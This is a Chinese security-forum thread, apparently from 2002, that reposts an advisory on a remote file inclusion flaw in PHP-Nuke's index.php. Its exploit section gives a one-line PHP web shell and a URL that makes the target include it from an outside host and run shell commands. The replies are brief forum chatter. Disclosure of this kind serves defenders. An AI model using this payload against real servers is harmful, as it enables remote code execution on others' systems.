论坛: 菜鸟乐园 标题: PHP-Nuke允许执行任意代码 复制本贴地址    
作者: group [group]    论坛用户   登录
www.unsecret.org翻译

发布日期: Jan 17 2002 1:30AM 
发布人: Handle Nopman <nopman@hackermail.com> 

在PHP-Nuke上有一个严重的安全漏洞,将会允许用户执行任意的PHP代码。

该漏洞出现在index.php的include file功能。它允许以如index.php?file=file的方式include文件
它防止了用户在URL内提交“..”,但是他没有禁止用户以http://-urls格式提交,请记住PHP有远程Get的能力。

利用方法:
将下列代码上传到你的目标主机上,存为evil.php
<?php
system($cmd);
?>
然后提交http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
这样就会执行ls -la命令

软件作者信息:
我已于2001年12月28日联系了作者,但是还没有答复

发布日期:2002年1月17日


地主 发表时间: 01/21 20:01

回复: NetDemon [netdemon]   ADMIN   登录
此类文章请发漏洞资料版

B1层 发表时间: 01/21 21:12

回复: group [group]   论坛用户   登录
系哦,呵呵,发惯了自己的版面,呵呵,听老大的:)

B2层 发表时间: 01/22 07:55

回复: songyi1999 [songyi1999]   论坛用户   登录
对不起,请问PHP-Nuke是什么?
是一个php论坛(bbs)的版本吗?
在其它php论坛好象没有这个漏洞.

B3层 发表时间: 01/22 09:35

回复: group [group]   论坛用户   登录
什么? 还不知道PHPNuke 是啥? 非常著名的Web Portal 软体 完全以 PHP+MySQL完成一个全功能的网站。

以下是广告:
PHPNuke挺好的,价格便宜,功能又多,我们一直用它
Nuke明天见……Nuke啊,天天见……

B4层 发表时间: 01/22 18:02

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号